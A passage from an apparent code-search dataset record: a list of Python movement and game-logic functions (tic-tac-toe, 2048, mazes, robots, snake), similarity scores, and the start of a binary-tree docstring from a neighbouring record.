direction %= 360\n if direction == 0:\n return (i - 1, j)\n if direction == 90:\n return (i, j + 1)\n if direction == 180:\n return (i + 1, j)\n if direction == 270:\n return (i, j - 1)\n raise ValueError(f\"Maze.move called with bad angle = {direction}\")", "def move(self, row, col, player):\n if self.winning == True:\n return\n if player == 1:\n val = 1\n else:\n val = -1\n self.row[row] += val\n self.col[col] += val\n if row == col:\n self.diagonal += val\n n = len(self.row)\n if row + col == n - 1:\n self.antidiagonal += val\n if abs(self.row[row]) == n or abs(self.col[col]) == n or abs(self.diagonal) == n or abs(self.antidiagonal) == n:\n self.winning = True\n return player\n return 0", "def moveable(self, board):\n # horizontal\n if self.direction == \"horizontal\":\n # the position to which the car wants to move is either 1 more or 1 less column wise\n right = self.get_cols()[1] + self.size - 1\n left = self.get_cols()[0] - 1\n # check if right or left is out of the boards margins \n if right > board.width_height:\n move_left = board.positions[self.get_rows()[0]][left]\n move_right = None\n elif left < 0:\n move_right = board.positions[self.get_rows()[0]][right]\n move_left = None\n else: \n move_right = board.positions[self.get_rows()[0]][right]\n move_left = board.positions[self.get_rows()[0]][left]\n\n # try to move left and right\n if move_right == \"x\" and move_left == \"x\":\n return \"leftright\"\n elif move_right == \"x\":\n return \"right\"\n elif move_left == \"x\":\n return \"left\"\n else: \n return \"none\"\n \n # vertical\n else:\n up = self.get_rows()[0] - 1\n #print(up)\n down = self.get_rows()[1] + self.size - 1\n # check if up or down is out of the boards margins \n if up < 0:\n # no room on the board for upward movement\n move_down = board.positions[down][self.get_cols()[0]]\n move_up = None\n elif down > board.width_height:\n # no room on the board for downward movement\n move_up = board.positions[up][self.get_cols()[0]]\n move_down = None\n else:\n # both up and down are possible positions on the board\n move_up = board.positions[up][self.get_cols()[0]]\n move_down = board.positions[down][self.get_cols()[0]]\n\n # try to move up and down\n if move_down == \"x\" and move_up == \"x\":\n return \"updown\"\n elif move_up == \"x\":\n return \"up\"\n elif move_down == \"x\":\n return \"down\"\n else: \n return \"none\"", "def move(direction: str, board : list) -> list:\n board_length = len(board)\n x, y = find_empty_space(board)\n \n increment_x = 0 \n increment_y = 0\n\n if direction == Direction.Up:\n increment_x, increment_y = Coordinate.Up.value\n elif direction == Direction.Down:\n increment_x, increment_y = Coordinate.Down.value\n elif direction == Direction.Left:\n increment_x, increment_y = Coordinate.Left.value\n elif direction == Direction.Right:\n increment_x, increment_y = Coordinate.Right.value\n\n x_new = x + increment_x\n y_new = y + increment_y\n\n is_valid = is_valid_move(x_new, y_new, board_length)\n\n if is_valid: \n temp = board[x][y]\n board[x][y] = board[x_new][y_new]\n board[x_new][y_new] = temp\n return board\n return None", "def move(self, direction):\n moved = False\n initial_tiles = self.dir_dic[direction]\n offset = OFFSETS[direction]\n if direction == UP or direction == DOWN:\n bound = self.grid_height\n else:\n bound = self.grid_width\n for tile in initial_tiles:\n temp = [self.get_tile(tile[0] + idx*offset[0], tile[1] + idx*offset[1]) \n for idx in range(bound)]\n temp = merge(temp)\n \n for idx in range(bound):\n row = tile[0] + idx*offset[0]\n col = tile[1] + idx*offset[1]\n if self.get_tile(row, col) != temp[idx]:\n moved = True\n self.set_tile(row, col, temp[idx]) \n if moved:\n self.new_tile()", "def move_to(self, shift: Move) -> Coordinate:\n if shift.direction == \"U\":\n new_coordinate = Coordinate(x=self.x, y=self.y + shift.dist)\n elif shift.direction == \"D\":\n new_coordinate = Coordinate(x=self.x, y=self.y - shift.dist)\n elif shift.direction == \"L\":\n new_coordinate = Coordinate(x=self.x - shift.dist, y=self.y)\n elif shift.direction == \"R\":\n new_coordinate = Coordinate(x=self.x + shift.dist, y=self.y)\n else:\n raise ValueError(f\"Unknown direction: '{shift.dir}'\")\n\n return new_coordinate", "def update_direction(self, move : np.ndarray, direction: np.ndarray):\r\n pos = move.copy()\r\n \r\n\r\n pos += direction\r\n while(self.in_board(pos)):\r\n if self.board[pos[0],pos[1]] == self.turn:\r\n pos -= direction\r\n while((pos != move).any()):\r\n self.board[pos[0], pos[1]] = self.turn\r\n self.count += 1\r\n pos -= direction\r\n break\r\n\r\n elif self.board[pos[0],pos[1]] == 0:\r\n\r\n break\r\n else:\r\n pos += direction", "def get_move(self, game):\n return", "def calMove(playerLocation, nextLocation):\n move_vector = tuple(np.subtract(nextLocation, playerLocation))\n for MOVE in DIRECTION_TO_CALCULATION:\n if move_vector == DIRECTION_TO_CALCULATION[MOVE]:\n return MOVE\n return \"Not right\"", "def change_cell(self):\n\n x, mu = self.update_position_direction(self.l_edge)\n mu_mean = self.calculate_mean_mu(self.x, x, self.l_edge)\n self.update_estimators(self.l_edge, mu_mean)\n\n if self.next_cell_index == self.grid.Ncells:\n # packet escapes\n self.is_escaped = True\n self.is_active = False\n self.mu = mu\n self.x = self.cell_xr\n\n elif self.next_cell_index == -1:\n\n raise GeometryException(\"No inner boundary in homogeneous sphere\")\n\n else:\n # packet is transported into target cell\n\n self.mu = mu\n\n if self.next_cell_index > self.cell_index:\n # packet is moved one cell to the right\n\n self.x = self.grid.xl[self.next_cell_index]\n\n else:\n # packet is moved one cell to the left\n\n self.x = self.grid.xr[self.next_cell_index]\n\n # reset cell-based properties for easy access\n self.cell_index = self.next_cell_index\n self.cell_chi = self.grid.chi[self.cell_index]\n self.cell_xl = self.grid.xl[self.cell_index]\n self.cell_xr = self.grid.xr[self.cell_index]\n self.cell_dx = self.grid.dx[self.cell_index]\n self.cell_dV = self.grid.dV[self.cell_index]\n\n # recalculate distances\n self.calculate_and_set_propagation_distances()", "def move(self):\n x = y = z = 0.0\n for cell in self.cells:\n x += (cell.x)#*n\n y += (cell.y)#*n\n z += (cell.z)#*n\n np = float(len(self.cells))\n med = numpy.array([x/np,y/np,z/np])\n \n dists = []\n for cell in self.cells:\n d = (cell.x-self.x)**2+(cell.y-self.y)**2+(cell.z-self.z)**2\n d = numpy.sqrt(d)\n dists.append(d)\n #md = (cell.x-med[0])**2+(cell.y-med[1])**2+(cell.z-med[2])**2\n #dists[-1] = (dists[-1]+md)/2\n cell = self.cells[numpy.argmin(dists)]\n cc = numpy.array([cell.x, cell.y, cell.z])\n \n t = self.t\n if abs(self.dnp) * ( self.np-self.np_req) > 0:\n t = self.tr\n self.dcenter = (1-t)*(med-self.center + self.u*(cc-med))\n self.x,self.y,self.z = self.center = self.center + self.dcenter", "def move(self):\n vector = vectors[compass.index(self.heading)]\n x = self.position[0] + vector[0]\n y = self.position[1] + vector[1]\n self._check_move(x, self.plateau[0])\n self._check_move(y, self.plateau[1])\n return replace(self, position=(x, y))", "def op_move_postconditions(self,oldPieceCoords,newPieceCoords):\n\n # Start of new state constrution\n next_gs_board = Board.from_binary_matrix(self.board)\n next_gs_board.set_element(newPieceCoords[0], newPieceCoords[1], self.curr_player)\n next_gs_board.remove_element(oldPieceCoords[0], oldPieceCoords[1])\n next_gs_next_player = self.curr_player\n next_gs_next_move = self.FREE\n next_gs_next_pieces = set()\n\n new_gs = Eximo(next_gs_next_player,next_gs_next_move,next_gs_next_pieces,next_gs_board)\n new_gs.last_piece = newPieceCoords\n\n # Check if moved piece has reached opposite side\n if(new_gs.reach_otherside(newPieceCoords)):\n new_gs.board.remove_element(newPieceCoords[0], newPieceCoords[1])\n new_gs.next_move = self.ADDPIECE_2\n new_gs.next_pieces = new_gs.addition_viable_tiles()\n new_gs.perform_checkup()\n\n else:\n new_gs.curr_player = self.get_enemy(self.curr_player)\n\n # Check if the next_piece checkup needs to be made\n if new_gs.curr_player == self.get_enemy(self.curr_player):\n new_gs.perform_checkup()\n\n return new_gs", "def result(self, row, col, move):\n start = (row, col)\n end = self.updateCell(row, col, move)\n\n return self.change(start, end)", "def move(self, row, col, player):\n offset = player * 2 - 3 # 1 or -1\n self.row[row] += offset\n self.col[col] += offset\n if row == col:\n self.diag += offset\n if row + col == self.n - 1:\n self.anti_diag += offset\n if self.n in [self.row[row], self.col[col], self.diag, self.anti_diag]:\n return 2\n if -self.n in [self.row[row], self.col[col], self.diag, self.anti_diag]:\n return 1\n return 0", "def change_cell(self):\n # TODO: assess whether this may partly moved into the base class\n\n x, mu = self.update_position_direction(self.l_edge)\n mu_mean = self.calculate_mean_mu(self.x, x, self.l_edge)\n self.update_estimators(self.l_edge, mu_mean)\n\n if self.next_cell_index == self.grid.Ncells:\n # packet escapes\n self.is_escaped = True\n self.is_active = False\n self.x = self.cell_xr\n\n elif self.next_cell_index == -1:\n # packets gets reflected\n\n self.x = self.cell_xl\n self.mu = -self.mu\n\n self.calculate_and_set_propagation_distances()\n\n else:\n # packet is transported into target cell\n if self.next_cell_index > self.cell_index:\n # packet is moved one cell to the right\n\n self.x = self.grid.xl[self.next_cell_index]\n\n else:\n # packet is moved one cell to the left\n\n self.x = self.grid.xr[self.next_cell_index]\n\n # reset cell-based properties for easy access\n self.cell_index = self.next_cell_index\n self.cell_chi = self.grid.chi[self.cell_index]\n self.cell_xl = self.grid.xl[self.cell_index]\n self.cell_xr = self.grid.xr[self.cell_index]\n self.cell_dx = self.grid.dx[self.cell_index]\n\n # recalculate distances\n self.calculate_and_set_propagation_distances()", "def make_move(self, board: Board) -> int:\n raise NotImplementedError", "def walk_right(self):\n if self.col_num == len(self.master_grid.matrix[0])-1 and self.row_num == len(self.master_grid.matrix)-1:\n return None\n if self.col_num == len(self.master_grid.matrix[0])-1:\n return Square(self.row_num+1, 0, self.master_grid)\n else:\n return Square(self.row_num, self.col_num + 1, self.master_grid)", "def computer_move(self):\n tree = LinkedBinaryTree(self)\n self.create_tree(tree)\n left_points = self._calculate_points(tree.get_left_child())\n right_points = self._calculate_points(tree.get_right_child())\n\n if left_points < right_points:\n next_board = tree.get_right_child().key\n else:\n next_board = tree.get_left_child().key\n self.board = next_board.board", "def move(x, y, direction, board):\n\n piece_at_xy = starter.get_piece(x, y, board); # Getting necessary pieces\n\n assert piece_at_xy != '*', \"Error in swipe logic\"; # Logical debug case\n valid_direction = (direction == \"left\" or\n direction == \"right\" or\n direction == \"up\" or\n direction == \"down\");\n assert valid_direction, \"Invalid direction passed in\"; # Logical debug case\n\n # The new x and y for the current piece (adjacent's current position) are stored alongside adjacent (fewer ifs + redundant code)\n if direction == \"left\":\n adjacent = (starter.get_piece(x - 1, y, board), x - 1, y);\n elif direction == \"right\":\n adjacent = (starter.get_piece(x + 1, y, board), x + 1, y);\n elif direction == \"up\":\n adjacent = (starter.get_piece(x, y - 1, board), x, y - 1);\n elif direction == \"down\":\n adjacent = (starter.get_piece(x, y + 1, board), x, y + 1);\n\n if adjacent[0] == None: # Edge of the board case (no action taken)\n return False;\n\n elif piece_at_xy != adjacent[0] and adjacent[0] != '*': # Can't combine two numbers case (no action taken)\n return False;\n\n elif adjacent[0] == '*': # Empty spot adjacent case (recursive movement in direction)\n starter.place_piece('*', x, y, board);\n starter.place_piece(piece_at_xy, adjacent[1], adjacent[2], board);\n move(adjacent[1], adjacent[2], direction, board);\n return True;\n\n elif piece_at_xy == adjacent[0]: # Adjacent same numbers case (combine them)\n starter.place_piece('*', x, y, board);\n starter.place_piece(str(int(adjacent[0]) * 2), adjacent[1], adjacent[2], board);\n move(adjacent[1], adjacent[2], direction, board);\n return True;\n\n else:\n # Logical debug case\n assert False, \"No way you should be in here. Error in move logic\";\n\n return False;", "def make_move(self, x, y):\n player = self.get_player()\n self.__grid[y][x] = player\n\n winner, win_tiles = self.check_move(self.get_player(), x, y)\n\n self.__turns_played += 1\n\n # Check if winner has been found\n if player == winner:\n loser = MarkerType(1 - winner.value)\n self.__winner = winner\n self.__loser = loser\n self.__state = GameState.WINNER\n return GameState.WINNER, winner, loser, win_tiles\n\n # Check if board is full and tie happens\n elif self.__turns_played >= Settings.SIZE_X * Settings.SIZE_Y:\n self.__state = GameState.TIE\n return GameState.TIE, MarkerType.NONE, MarkerType.NONE, []\n\n self.__turn += 1\n return GameState.PLAYING, MarkerType.NONE, MarkerType.NONE, []", "def move(self):\n\n # get the location we WOULD go to\n newX = self.xcor() + self.dx\n newY = self.ycor() + self.dy\n while (abs (newX) > self.BOX_RANGE) or (abs(newY) > self.BOX_RANGE):\n # print(\"choosing new direction... \",end=\"\")\n self.chooseNewDirection()\n # print(self.dx, self.dy)\n newX = self.xcor() + self.dx\n newY = self.ycor() + self.dy\n\n # now move our monster\n super().move()", "def make_move(self):\n\n # If the agent is starting a game, make an \n # initial move\n if self.get_play_status() == False: \n self.initial_move()\n return\n\n # for speeds sake, allow the reflex agent to respond to manual\n # input. comment out for automatic running.\n x = int(input('hotwire x:'))\n y = int(input('hotwire y:'))\n return self.get_game_space().set_tile(x,y,self.get_affinity())\n\n # Check wheather the the agent side is going to \n # win by making one move, make the move\n # OR\n # Check if the oponent has a compromising move \n best_move = self.victory_check()\n if best_move is None: best_move = self.counter_opponent_win()\n if best_move is None: best_move = self.counter_opponent_adv()\n if best_move is None: best_move = self.best_last_option()\n if best_move != None: \n x = best_move[0]\n y = best_move[1]\n return self.get_game_space().set_tile(x,y,self.get_affinity())", "def get_new_coordinate(x_y_coordinate: dict, move_direction: str) -> tuple:\n direction_dict = {'n': (0, -1), 's': (0, 1), 'w': (-1, 0), 'e': (1, 0)}\n x = x_y_coordinate['x'] + direction_dict[move_direction][0]\n y = x_y_coordinate['y'] + direction_dict[move_direction][1]\n return x, y", "def make_move(self, board: Board) -> int:\n move, evalutation = self.minimax(board, -math.inf, math.inf, self._depth, 1)\n return move", "def move(self, direction):\n newx = self.x\n newy = self.y\n newy += random.randint(-1, 1)\n newx += random.randint(-1, 1)\n if self.tmap.contents[newy][newx] != '#':\n self.x = newx\n self.y = newy", "def move(self, direction):\n # Store the values in the connection dictionary in a list\n self.room_num = self.current_room.connection[direction]\n\n # Check if there is a conditional movement and change the current room\n if len(self.room_num) == 1:\n self.current_room = self.rooms[int(self.room_num[0]) - 1]\n else:\n adventure.check(len(self.room_num))", "def get_gridState(self,real_state=None):\r\n if real_state is None:\r\n # convert unit back to mm\r\n r_state =[self.real_state[0],self.real_state[1],self.real_state[2]]\r\n else:\r\n r_state = real_state\r\n\r\n grid_state = [0,0,0]\r\n # assume orignal point is the center of the starting piece\r\n for i in range(2):\r\n if np.abs(real_state[i]) < (self.grid_size)/2.0:\r\n grid_state[i] =0\r\n else:\r\n # tol = round(self.grid_size/10.0, 2) #tolerance of floating point number\r\n tol =15.0 #1.5cm as tolerance\r\n grid_state[i] = int((real_state[i]-(self.grid_size)/2.0)//self.grid_size)\r\n remain = 1 if (real_state[i]-(self.grid_size)/2.0)%self.grid_size >=tol else 0\r\n grid_state[i] += remain\r\n\r\n # convert rad to degree\r\n real_angle = 180.0*(real_state[2]/math.pi)\r\n a = [abs(real_angle - i) for i in self.angle_set]\r\n i = np.argmin(a)\r\n # calculate approximate degree in grid world\r\n grid_state[2] = self.angle_set[i]\r\n # print(\"grid angle:\",grid_state[2],\"real ag:\",real_angle)\r\n\r\n # correct the degree in rad for moving\r\n # agl_rad = grid_state[2]*(math.pi/180.0)\r\n # correct_rot = -(real_state[2] - agl_rad)\r\n # sp = 100\r\n # t = (correct_rot* (math.pi/180))/sp\r\n # cur_t = time.time()\r\n # past_t = cur_t\r\n # while abs(past_t-cur_t) <=t+0.5:\r\n # self.Roomba.Move(0,sp)\r\n # cur_t = time.time()\r\n # self.Roomba.Move(0,0)\r\n\r\n return grid_state", "def move(self, board):\n # first, make your turn:\n currentState = board[self.x,self.y]\n turnDir = self.rule[(currentState + 1) % len(self.rule)]\n self.turn( int(turnDir) )\n # next, let's change this cell's state:\n if currentState >= len(self.rule) - 1:\n board[self.x,self.y] = 0\n else:\n board[self.x,self.y] = currentState + 1\n # and let's move:\n offsets = self.nextPositionOffset() # based on x, y, and dir\n self.x, self.y = board.move(self.x, self.y, offsets[0], offsets[1])", "def move(self):\n c = self.get_position()\n\n f = c['f']\n if f == 'NORTH':\n c['y'] += 1\n elif f == 'EAST':\n c['x'] += 1\n elif f == 'SOUTH':\n c['y'] -= 1\n elif f == 'WEST':\n c['x'] -= 1\n\n if self.valid_position(c):\n self.update_position(c)\n else:\n raise ValueError('InvalidPosition')", "def move(self, row, col, player):\n toadd = 1 if player == 1 else -1\n \n self.row[row] += toadd\n self.col[col] += toadd\n if row == col: self.diagonal += toadd\n if col == self.n - row -1 : self.antidiag += toadd\n \n if abs(self.row[row]) == self.n or abs(self.col[col]) == self.n or abs(self.diagonal) == self.n or abs(self.antidiag) == self.n:\n return player\n else:\n return 0", "def move(self, row: int, col: int, player: int) -> int:\n n = self.n\n if player == 1:\n self.rows_1[row] += 1\n self.cols_1[col] += 1\n if player == 2:\n self.rows_2[row] += 1\n self.cols_2[col] += 1\n if row == col:\n self.diag1[row] = player\n if row + col + 1 == n:\n self.diag2[row] = player\n f = 0\n g = 0\n for i in range(n):\n if self.rows_1[row] == n or self.cols_1[col] == n:\n return 1\n if self.rows_2[row] == n or self.cols_2[col] == n:\n return 2 \n if self.diag1[i] != self.diag1[0]:\n f = 1\n if self.diag2[i] != self.diag2[0]:\n g = 1\n if f == 0:\n return self.diag1[0]\n if g == 0:\n return self.diag2[0]\n return 0", "def get_move(self, game, time_left):\n legal_moves = game.get_legal_moves()\n if not legal_moves:\n return (-1, -1)\n return legal_moves[randint(0, len(legal_moves) - 1)]", "def move(self, direction):\n if direction in self.linked_rooms:\n return self.linked_rooms[direction]\n else:\n print(\"You can't go that way\")\n return self", "def test_move():\n human = Human()\n coordinates = [2, 1]\n dimensions = [3, 4]\n\n new_coordinates = human.move(coordinates, dimensions)\n\n possible_new_coordinates = [[2, 0], [3, 0], [3, 1], [3, 2], [2, 2], [1, 2], [1, 1], [1, 0]]\n\n assert new_coordinates in possible_new_coordinates", "def move(self, row, col, player):\n value = (1.5 - player) * 2\n self.rows[row] += value\n self.colums[col] += value\n if row == col:\n self.diag[0] += value\n if row + col == self.n-1:\n self.diag[1] += value\n if abs(self.rows[row]) == self.n or abs(self.colums[col]) == self.n or abs(self.diag[0]) == self.n or abs(self.diag[1]) == self.n:\n return player\n return 0", "def move_of_king_and_rook(self, from_row, from_col, to_row, to_col): \n #provjere da li su kraljevi ili topovi inicirali pomijeranje\n if(from_row == 7 and from_col == 0):\n self.wrl_moved = True\n elif(from_row == 7 and from_col == 7):\n self.wrr_moved = True\n elif(from_row == 7 and from_col == 4):\n self.wk_moved = True\n elif(from_row == 0 and from_col == 0):\n self.brl_moved = True\n elif(from_row == 0 and from_col == 7):\n self.brr_moved = True\n elif(from_row == 0 and from_col == 4):\n self.bk_moved = True\n \n #provjera da li je neko pojeo topove\n if(to_row == 7 and to_col == 0):\n self.wrl_moved = True\n elif(to_row == 7 and to_col == 7):\n self.wrr_moved = True\n elif(to_row == 0 and to_col == 0):\n self.brl_moved = True\n elif(to_row == 0 and to_col == 7):\n self.brr_moved = True", "def arrowMoveObject(self, event, cell, spaces=1):\n direction = self.input.checkDirectionInput(event)\n try:\n x = cell[0]\n y = cell[1]\n except TypeError:\n print \"arrowMoveObject: cell is of type\", type(cell)\n return None\n try:\n if direction == 1:\n if y + spaces <= self.rows - 1:\n cell = (x, y+spaces)\n else:\n cell = (x, self.rows-1)\n elif direction == 2:\n if y -spaces >= 0:\n cell = (x, y-spaces)\n else:\n cell = (x, 0)\n elif direction == 3:\n if x - spaces >= 0:\n cell = (x-spaces, y)\n else:\n cell = (0, y)\n elif direction == 4:\n if x + spaces <= self.columns - 1:\n cell = (x+spaces, y)\n else:\n cell = (self.columns-1, y)\n except IndexError:\n print \"no dice\"\n return cell\n \n self.moveObject((x, y), cell)\n return cell", "def move_in_direction(self, direction):\n if direction == NORTH:\n self.__position[y] += 1\n elif direction == NORTHEAST:\n self.__position[x] += 1\n self.__position[y] += 1\n elif direction == EAST:\n self.__position[x] += 1\n elif direction == SOUTHEAST:\n self.__position[x] += 1\n self.__position[y] -= 1\n elif direction == SOUTH:\n self.__position[y] -= 1\n elif direction == SOUTHWEST:\n self.__position[x] -= 1\n self.__position[y] -= 1\n elif direction == WEST:\n self.__position[x] -= 1\n elif direction == NORTHWEST:\n self.__position[x] -= 1\n self.__position[y] += 1", "def move(self, horizontal_pos, vertical_pos):\n print(horizontal_pos, vertical_pos, MOVE_LIMITS)\n if horizontal_pos in MOVE_LIMITS and vertical_pos in MOVE_LIMITS:\n horizontal_coord = self.position[0] + horizontal_pos\n vertical_coord = self.position[1] + vertical_pos\n if self.position_in_grid_range(horizontal_coord, vertical_coord):\n self.position[0] += horizontal_pos\n self.position[1] += vertical_pos\n else:\n raise IllegalMoveException(\"Player position outside grid range {} {}\".format(vertical_coord, horizontal_coord))\n else:\n raise IllegalMoveException(\"Player moves not in range {}\".format(MOVE_LIMITS))\n return self.position", "def test_human_cannot_move_through_grid_wall(mock_random):\n mock_random.randint.return_value = 0\n human = Human()\n\n coordinates = [0, 0]\n dimensions = [4, 4]\n\n new_coordinates = human.move(coordinates, dimensions)\n assert new_coordinates == [0, 0]", "def make_move(self, move: Tuple[int, int]) -> MoveError:\n\n # Make sure our move is going to be valid\n if self.is_winner():\n return MoveError.GAME_WON\n\n elif move[0] >= self._board_size or move[0] < 0 or move[1] >= self._board_size or move[1] < 0:\n return MoveError.OUT_OF_RANGE\n\n elif self._board[move[1]][move[0]] != self.NEUTRAL_PLAYER:\n return MoveError.TAKEN\n\n # If we make it to here, then it is valid to make the move\n self._board[move[1]][move[0]] = self._players[self._current_player]\n self._number_of_moves = self._number_of_moves + 1\n self._last_move = move\n\n self._check_for_winner()\n\n # Only change who the player is if we didn't get a winner,\n # otherwise the final board's color will be wrong\n if not self.is_winner():\n self._current_player = (self._current_player + 1) % len(self._players)\n\n return MoveError.OKAY", "def get_move(self, game, time_left):\n self.time_left = time_left\n return self.minimax(game, self.search_depth)", "def updatePositionAndClean(self):\n #X direction (num. rows) wall limit is the width of rectangular room\n #Y direction (num. cols) wall limit is the height of rectangular room\n #So (0,0) is in bottom LEFT corner--since rows start at zero at BOTTOM, not top\n #direction works as you would think, with east at 0 or 360 degrees, 90 degrees at north,\n #180 degrees at west, and 270 degrees at south direction\n\n #so each time unit, getNewPosition in SAME direction if you don't hit the wall\n #if you hit the wall, then get a new RANDOM direction and then recalculate new position,\n #making sure it is a valid position on grid, has not already been cleaned (tile visited)\n\n #So it makes no difference which direction you are moving in--the getNewPosition() function\n #figures out mathematically what the next position is, based on grid, and you just have to\n #determine whether you have hit the wall in that same direction--don't have to look at the\n #number the degrees or radians in that particular direction--just moving in same direction,\n #get next position, do you hit the wall, if so get new random direction, move that way, if you\n #won't hit a wall that way.\n\n #If you don't hit a wall when you calculate a new direction, but the tile is clean already, then\n #just go through the tiles and find one that is not clean yet, and move in the same direction.\n \n robotPos = self.getRobotPosition()\n posx = robotPos.getX()\n posy = robotPos.getY()\n posx = math.floor(posx)\n posy = math.floor(posy)\n #First check if this position is clean:\n #if (self.room.isTileCleaned(posx,posy) == False):\n #then clean this tile!\n #self.room.cleanTileAtPosition(robotPos)\n #Now see where to move robot next on floor and clean that tile if it is not clean\n #So first try moving in same direction--will you hit a wall?\n newPos = self.position.getNewPosition(self.direction,self.speed)\n newPosx = newPos.getX()\n newPosy = newPos.getY()\n newPosx = math.floor(newPosx)\n newPosy = math.floor(newPosy)\n if (self.room.isPositionInRoom(newPos)) and (self.room.isTileCleaned(newPosx,newPosy) == False):\n #position is in room AND the tile has NOT been visited yet--since it's still DIRTY\n #Should NOT have to check whether you hit a wall, since new position is in room\n #so NO NEW DIRECTION needed yet--move in SAME direction\n self.setRobotPosition(newPos)\n self.room.cleanTileAtPosition(newPos)\n #print \"Moved in SAME DIRECTION I was moving in last time, direction = \" + str(self.direction)\n else: # (self.room.isPositionInRoom(newPos) == False) or (self.room.isTileCleaned(newPosx, newPosy) == True):\n # either HIT WALL -- OR -- tile already cleaned -- so calculate new RANDOM direction\n\n #NOTE: this works until you are surrounded by tiles that have no next step tile that has not already been\n #cleaned?\n #?? think a problem is that if all surrounding tiles are already clean, then, in that case,\n #you can get stuck in situation where you keep recalculating a new random direction, but when you take a step,\n #all the next tiles have already been cleaned, and you get stuck in a loop, so in this case, you must\n #not recalculate a new direction, but rather keep going in same direction until you find a tile not clean,\n #and jump to that tile instead, and go from there.\n #So find this case--see if that corrects this issue!\n \n keepTryingNewDirection = True\n while (keepTryingNewDirection == True):\n self.direction = random.randrange(0,359) #get new random direction\n newPos = self.position.getNewPosition(self.direction,self.speed) #get new next position step with new direc.\n newPosx = newPos.getX()\n newPosy = newPos.getY()\n newPosx = math.floor(newPosx)\n newPosy = math.floor(newPosy)\n if (self.room.isPositionInRoom(newPos)) and (self.room.isTileCleaned(newPosx,newPosy) == False):\n #new position in new direction is in room, and the tile has not been cleaned yet\n #so new direction and new tile to clean found!\n self.setRobotPosition(newPos)\n self.room.cleanTileAtPosition(newPos)\n #print \"Moved in NEW DIRECTION I was moving in last time, direction = \" + str(self.direction)\n keepTryingNewDirection = False\n elif (self.room.isPositionInRoom(newPos) == False):\n #new position in new direction NOT in room -- try again!\n #print \"new direction found a new position not in room --hit wall--try again! direction = \" + str(self.direction)\n continue\n else:\n #print \"new direction produced new position in room but tile already clean--try again?! direction = \" + str(self.direction)\n #print \"first check to see if all tiles have already been cleaned.\"\n #?? Any other checks needed here? list of tiles visited? is this really needed??\n #calculate list of cells not clean yet\n tilesCleaned = []\n allSurroundingTilesClean = False\n foundTileUnclean = False\n saveWidth = 0\n saveHeight = 0\n for i in range(0,self.room.width):\n for j in range(0,self.room.height):\n if (self.room.isTileCleaned(i,j) == False):\n saveWidth = i\n saveHeight = j\n foundTileUnclean = True\n else:\n #print \"appending to tiles cleaned: tile: i = \" + str(i) + \" j = \" + str(j)\n tilesCleaned.append((i,j)) #make list of tiles cleaned\n if (foundTileUnclean == True):\n #print \"not all tiles are clean!--start here rather than getting new direc. i = \" + str(saveWidth) + \" j = \" + str(saveHeight)\n newPos = Position(saveWidth,saveHeight)\n self.setRobotPosition(newPos)\n self.room.cleanTileAtPosition(newPos)\n #print \"Found new tile that was not clean! current direc. \" + str(self.direction)\n #print \"tile location x = \" + str(saveWidth) + \" y = \" + str(saveHeight)\n keepTryingNewDirection = False\n else:\n keepTryingNewDirection = False\n #print \"all tiles clean! stop cleaning!-- do not look for new direction! should be done.\"\n\n #for tile in tilesCleaned:\n #print tile", "def move(self, direction: str) -> int:\n # O(1) per move\n\n cur_pos = self.positions[-1]\n\n move = self.moves[direction]\n new_pos = cur_pos[0] + move[0], cur_pos[1] + move[1]\n\n if new_pos[0] == self.height or new_pos[0] == -1 or new_pos[1] == self.width or new_pos[1] == -1 or (new_pos in self.positions_set and new_pos != self.positions[0]):\n return -1\n\n self.positions.append(new_pos)\n self.positions_set.add(new_pos)\n\n if self.eaten < len(self.food) and new_pos == self.food[self.eaten]:\n self.eaten += 1\n else:\n tail = self.positions.popleft()\n\n if tail != self.positions[-1]:\n self.positions_set.remove(tail)\n\n return self.eaten", "def update_grid(self):\n if self.game_over:\n return\n if self.active_piece is None:\n self.place_new_piece()\n if self.piece_collision_exists(self.active_piece):\n self.handle_active_piece_collision()\n self.place_new_piece()\n self.shift_cells(self.active_piece, self.current_direction)\n self.active_piece = TransformPiece.shift_coordinates(self.active_piece, self.current_direction)\n self.merge_with_completed_rows()\n if self.is_game_won():\n self.game_over = True", "def get_move(self, board):\n while True:\n col = random.randint(0, board.width)\n row = board.try_move(col)\n\n if row >= 0:\n break\n\n return row, col", "def get_new_origin(self, direction=None):\n y, x = 1, 0\n direction_coords = {'origin': (0, 0), 'right': (0, 1), 'left': (0, -1)}\n if direction and direction in direction_coords:\n y, x = direction_coords[direction]\n return (self.origin[0] + y, self.origin[1] + x)", "def get_coord_in_direction(self, position, direction):\n x_r = position[x]\n y_r = position[y]\n if direction == NORTH:\n y_r = y_r + 1\n elif direction == NORTHEAST:\n x_r = x_r + 1\n y_r = y_r + 1\n elif direction == EAST:\n x_r = x_r + 1\n elif direction == SOUTHEAST:\n x_r = x_r + 1\n y_r = y_r - 1\n elif direction == SOUTH:\n y_r = y_r - 1\n elif direction == SOUTHWEST:\n x_r = x_r - 1\n y_r = y_r - 1\n elif direction == WEST:\n x_r = x_r - 1\n else: # direction == NORTHWEST\n x_r = x_r - 1\n y_r = y_r + 1\n\n return (x_r, y_r)" ]
[ "0.6662709", "0.6605978", "0.6600228", "0.6573474", "0.6549251", "0.65067387", "0.6477407", "0.6455114", "0.64177567", "0.6393052", "0.6361281", "0.6359388", "0.6349698", "0.63481045", "0.63376284", "0.63300747", "0.63202614", "0.6316886", "0.630494", "0.62923414", "0.62752783", "0.6271348", "0.6218553", "0.6210817", "0.62067926", "0.6187448", "0.61868685", "0.61863774", "0.61756545", "0.6156275", "0.61502284", "0.61461973", "0.6143296", "0.612764", "0.612045", "0.611599", "0.61076444", "0.6097747", "0.6092213", "0.60891056", "0.6075372", "0.60721976", "0.6063659", "0.6049777", "0.6035465", "0.6026365", "0.6021066", "0.5992026", "0.59900814", "0.59841377", "0.5975527", "0.5972637", "0.5972443", "0.59683204", "0.5964065", "0.59382653", "0.5927685", "0.5923138", "0.59209055", "0.5917509", "0.59152913", "0.5879647", "0.5876115", "0.5874654", "0.58743906", "0.5870701", "0.586861", "0.58641946", "0.58558655", "0.5855506", "0.58491296", "0.58451754", "0.5842654", "0.58423245", "0.58412987", "0.5825554", "0.58255476", "0.5820749", "0.58074075", "0.5806614", "0.5806031", "0.58045244", "0.5800808", "0.5799889", "0.57976466", "0.5791746", "0.5787598", "0.5787319", "0.5786486", "0.57844657", "0.57840824", "0.5782476", "0.57797563", "0.5777567", "0.57724035", "0.5771067", "0.57688737", "0.57672983", "0.57672256", "0.5766434" ]
0.7444775
0
Return any binary tree that matches the given preorder and postorder traversals. Values in the traversals pre and post are distinct positive integers.
